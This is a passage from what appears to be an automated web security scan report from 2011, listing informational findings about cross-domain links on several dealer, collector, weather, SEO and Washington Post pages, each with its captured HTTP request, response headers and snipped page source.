<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=18_47">Performance Packages</a>
...[SNIP]...
<strong><a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=16">Yamaha Parts</a>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=16_82">SHO/FZ Packages</a><br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=16_168">VXR/VXS Packages</a>
...[SNIP]...
<strong><a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=17">Kawasaki Parts</a>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=17_177"><i>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=17_60">250/260 X & LX Packages</a><br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=106">MoTeC Engine Management</a>
...[SNIP]...
<br />
<a href="http://partsfinder.onlinemicrofiche.com/4tec/partsfinder.htm">OEM Parts Finder</a>
...[SNIP]...
<br />
<a href="http://www.amsoil.com/redirect.cgi?zo=1499968&page=index">Order Amsoil</a>
...[SNIP]...
<br />
&nbsp;- <a href="http://www.x-h2o.com/">XH20</a><br />
&nbsp;- <a href="http://www.motasdeagua.com/">Portugal PWC</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<li style="align:center; text-align: center;"><a href="http://www.vbulletin.org/forum/showthread.php?t=233871" style="font-size: 10px; color: gray;">Everywhere sidebar 1.4.1</a>
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<!-- Do not remove this copyright notice -->
   Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a>
...[SNIP]...
<br /><a href="http://advertising.digitalpoint.com/" target="_blank">Advertising positioning</a>
...[SNIP]...

23.70. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
</script>

<script type="text/javascript" src="http://tracker.mattel.com/?hotwheelscollector"></script>
<noscript><img id="dcsimg_v8" width="1" height="1" src="http://statse.webtrendslive.com/dcsf5g6jw000004jtaoxtxjha_8f5o/njs.gif?dcsuri=%2fHWCErrorPage.aspx%3ferrID%3d404&amp;WT.js=No&amp;WT.tv=8.0.0&amp;brand=hotwheelscollector" alt="" border="0" /></noscript>
...[SNIP]...
<li class="imatm" style="width:65px;"><a href="http://www.hotwheelsshop.com/" himg="/images/globalmenu30/nav_shop_on.gif" style="background-image:url(/images/globalmenu30/nav_shop_off.gif);background-repeat:no-repeat;background-position:left top;"></a>
...[SNIP]...
</span> &nbsp; &nbsp;
   <a href="http://www.facebook.com/hotwheels" title="Facebook" class="footer" style='text-decoration: none;' target="_blank" > <img src="/images/ver3_0/facebook_logo.png" alt="Facebook" width="25" height="25" border="0"></a> &nbsp; &nbsp;&nbsp;
   <a href="http://twitter.com/hotwheelsonline" title="Twitter" class="footer" style='text-decoration: none;' target="_blank" > <img src="/images/shared/twitter_logo.png" alt="Twitter" width="25" height="25" border="0"></a> &nbsp; &nbsp;
   <a href="http://www.youtube.com/hotwheels" title="YouTube" class="footer" style='text-decoration: none;' target="_blank" > <img src="/images/shared/youtube_logo.png" alt="YouTube" width="69" height="25" border="0">
...[SNIP]...
<p style="margin:8px 0 4px 0;">
<a href="http://corporate.mattel.com/privacy-policy.aspx" target="_blank" class="footer">ONLINE PRIVACY POLICY</a>
...[SNIP]...
<p style="margin:0 0 4px 0;">
<a href="http://corporate.mattel.com/global/terms-conditions.aspx" target="_blank" class="footer"> Terms and Conditions</a> &nbsp;
<a href="http://corporate.mattel.com/global/Shopping-Terms-collectors.aspx" target="_blank" class="footer"> Website Shopping Terms of Sale</a>
...[SNIP]...
</script><a href="http://www.opencube.com" style="display:none;">Infinite Menus, Copyright 2006, OpenCube Inc. All Rights Reserved.</a>
...[SNIP]...

23.71. http://www.ibegin.com/weather/weather_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 773


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a>
...[SNIP]...

23.72. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:38 GMT
Content-Length: 7841
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js"
type="text/javascript">
</script>
...[SNIP]...

23.73. http://www.ronniesmailorder.com/fiche_select1.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/flash_loader.js" language="javascript"></script>
<script src="http://www.powersportsnetwork.com/jquery_min.js" language="javascript"></script>
...[SNIP]...
<li style="width:110px;"><a class="HDR_VERT_LINKOFF" target="_new" href="http://stores.ebay.com/RONNIES-POWERSPORTS/USED-PARTS-/_i.html?_fsub=2145074014&_sid=26334804&_trksid=p4634.c0.m322"><nobr>
...[SNIP]...
<li style="width:150px;"><a class="HDR_VERT_LINKOFF" target="_new" href="http://stores.ebay.com/Ronnies-Powersports"><nobr>
...[SNIP]...
</div><img src="http://cdn-9.psndealer.com/e2/dealersite/images/ronniesmailorder/header.jpg" width="956" height="161" border="0" usemap="#Map"></TD>
...[SNIP]...
<!--CENTER CONTENT AREA-->
                   <img height="10" src="http://cdn-9.psndealer.com/e2/dealersite/images/ronniesmailorder/content_top_detail0.jpg"><BR>
...[SNIP]...
<a href="./fiche_select.asp?srt=mfg" style="vertical-align:middle;" class="NV_mod_detail_breadCrumbs_text">
       
    <img style="text-decoration:none; border:0px;" src="http://cdn-9.psndealer.com/e2/dealersite/images/kawasaki_logo.jpg" alt="Kawasaki" width="100">
   
        </a>
...[SNIP]...
<span class="indicator" id="2011_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2010_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2009_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2008_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2007_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2006_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2005_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2004_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2003_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2002_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2001_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2000_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1999_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1998_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1997_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1996_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1995_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1994_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1993_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1992_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1991_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1990_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1989_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1988_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1987_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1986_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1985_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1984_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<TD WIDTH="178" VALIGN="BOTTOM"><a target="PSN" HREF="http://www.powersportsinfo.com/miscpage_002.asp"><IMG SRC="http://cdn-9.psndealer.com/e2/dealersite/images/spacer.gif" border="0" width="147" height="20"></A>
...[SNIP]...
</A>
                    <a href="http://www.powersportsnetwork.com" target="PSN" class="dummy"><font color="White" size="1" face="Arial">
...[SNIP]...
<area shape="rect" coords="418,3,783,37" href="http://www.ronniesmailorder.com/policy.asp">
<area shape="rect" coords="664,76,771,113" href="http://www.facebook.com/ronniesmailorder" target="_blank" alt="Facebook">
</map>
...[SNIP]...

23.74. http://www.seoq.com/ajaxAction.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /ajaxAction.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ajaxAction.php?url=onlinemicrofiche.com&sid=0.2201897264458239 HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:28:43 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:28:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"></a><a href="http://del.icio.us/post?url=http://www.seoq.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"></a><a href="http://www.stumbleupon.com/submit?url=www.seoq.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seoq.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31">
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
ur community of business owners, webmasters and SEO professionals to stay on top of emerging search and social media marketing trends.
| Copyright &copy; 2011 SEO Quotient&trade; All Rights Reserved | <a href="http://www.inqbation.com/" alt="washington dc web designer" target="_blank">washington dc web designer</a> : <a href="http://www.inqbation.com/" alt="washington dc web designer inQbation" target="_blank">inQbation</a>
...[SNIP]...

23.75. http://www.washingtonpost.com/wl/jobs/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
</script>

<script src="https://js.revsci.net/gateway/gw.js?csid=J05531"></script>
...[SNIP]...
</div>        
   
   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...
<div class="jobsBox3_content jobsMicrotile">
                           <a href="https://www2.recruitingcenter.net/Clients/catapulttechnology/PublicJobs/controller.cfm" target="microtile"><img src="http://www.washingtonpost.com/wp-adv/jobs4/microtileImages/1210795891252_Catapult.gif" height="19" width="122" border="0"/>
...[SNIP]...
</strong> <a href="https://www2.recruitingcenter.net/Clients/catapulttechnology/PublicJobs/controller.cfm" target="microtile">High Tech company now hiring</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=3005617&cv=2.0&cj=1" />
</noscript>
...[SNIP]...

23.76. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_footer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_footer.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /wp-adv/jobs4/javascript/jobs_footer.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Sep 2010 18:47:39 GMT
ETag: "1ec4-4c93b7cb"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7876

function showGlobalFooter(node) {
   //_gnpost.timesThrough = 1;
   //placeChannelNav(node);
   //commenting out new footer
   //document.write("<div style='width:970' id='footer'>");
   //document.write("
...[SNIP]...
<li><a class="icon post-store" href="http://www.cafepress.com/washingtonpost">Post Store</a>
...[SNIP]...
<li><a class="icon facebook" href="http://www.facebook.com/washingtonpost">Facebook</a>
...[SNIP]...
<li><a class="icon twitter" href="http://twitter.com/washingtonpost">Twitter</a>
...[SNIP]...
<li><a class="icon video" href="http://washingtonpostlive.com">Washington Post Live</a>
...[SNIP]...
<li><a href="http://www.washpost.com/index.shtml">About Us</a>
...[SNIP]...
<li><a href="http://www.washpost.com">About The Post</a>
...[SNIP]...
<li><a href="https://subscription.washpost.com/subscriberservices/subscriber.portal?state=welcome&oscode=RPWE">Subscribe</a>
...[SNIP]...
<li><a href="https://subscription.washpost.com/subscriber.portal?state=welcome">Home delivery service</a>
...[SNIP]...
<li><a href="http://thewashingtonpost.newspaperdirect.com/">e-Replica</a>
...[SNIP]...
<li><a href="http://www.washpostco.com/phoenix.zhtml?c=62487&p=irol-landing">Post Company web sites</a>
...[SNIP]...
<li><a href="http://www.washingtonpostads.com/">In the newspaper</a>
...[SNIP]...
<li><a class="slate" target="_blank" href="http://www.slate.com">Slate</a>
...[SNIP]...
<li><a class="who-runs-gov" target="_blank" href="http://www.whorunsgov.com/">Who Runs Gov</a>
...[SNIP]...
<li><a class="express-night-out" target="_blank" href="http://www.expressnightout.com/">Express Night Out</a>
...[SNIP]...
<li><a class="el-tiempo-latino" target="_blank" href="http://eltiempolatino.com/">El Tiempo Latino</a>
...[SNIP]...
<li class="last"><a class="the-root" target="_blank" href="http://theroot.com/">The Root</a>
...[SNIP]...

23.77. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnavLogo.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /wp-srv/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Dec 2009 18:05:30 GMT
ETag: "1e1f-4b3b966a"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7711

function placeChannelNavLogo() {
var Registration = function(){}
Registration.REGISTRATION_COOKIE = "wpniuser";
Registration.PLUCK_COOKIE = "hd";
Registration.FACEBOOK_UID_COOKIE=
...[SNIP]...
<br><a href="https://subscription.washpost.com/subscriberservices/subscriber.portal?state=welcome&oscode=RPWS" title="Subscribe | Home Delivery Customer Service">Subscribe</a>
...[SNIP]...

23.78. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnav_v2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnav_v2.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /wp-srv/ssi/globalnav/js/channelnav_v2.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Tue, 31 Aug 2010 17:32:50 GMT
ETag: "ac8f-4c7d3cc2"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 44175

document.write('<link href="http://www.washingtonpost.com/wp-srv/ssi/globalnav/css/wp_global_nav.css" rel="stylesheet" media="all"/>');
document.write('<link href="http://www.washingtonpost.com/wp-sr
...[SNIP]...
</a> | <a href="http://washpost.com/wpnihomepage?nav=globetop">Subscribe to</a>';
   out += '            <a href="http://washpost.com/wpnihomepage?nav=globetop"><img src="http://media.washingtonpost.com/wp-srv/article/pieces/twpLogo_125x20.gif" width="125" height="20" alt="The Washington Post" border="0" style="position:relative;top:4px;"/>
...[SNIP]...
</span> <a href="http://pqasb.pqarchiver.com/washingtonpost/search.html">Search Archives</a>
...[SNIP]...
</span>';
out+='            <a href="http://www.mywashingtonpost.com/">mywashingtonpost.com</a>
...[SNIP]...
</span>';
out+='            <a href="http://www.washingtonpostmedia.com/careers/">Work for Us</a>
...[SNIP]...
</span>';
out+='            <a href="https://subscription.washpost.com/subscriberservices/subscriber.portal?state=welcome&oscode=RPW1"><b>
...[SNIP]...
</span>';
out+='            <a href="http://adsite.washpost.com/">Advertisers</a>
...[SNIP]...
</span>';
out+='            <a href="http://thewashingtonpost.newspaperdirect.com">e-Replica</a>
...[SNIP]...
</span>';
out+='<a href="http://www.cafepress.com/washingtonpost/">The Washington Post Store</a>
...[SNIP]...
</span>';
out+='            <a href="http://www.washpostco.com/index.htm">Information and Other Post Co. Websites</a>
...[SNIP]...
</p>';
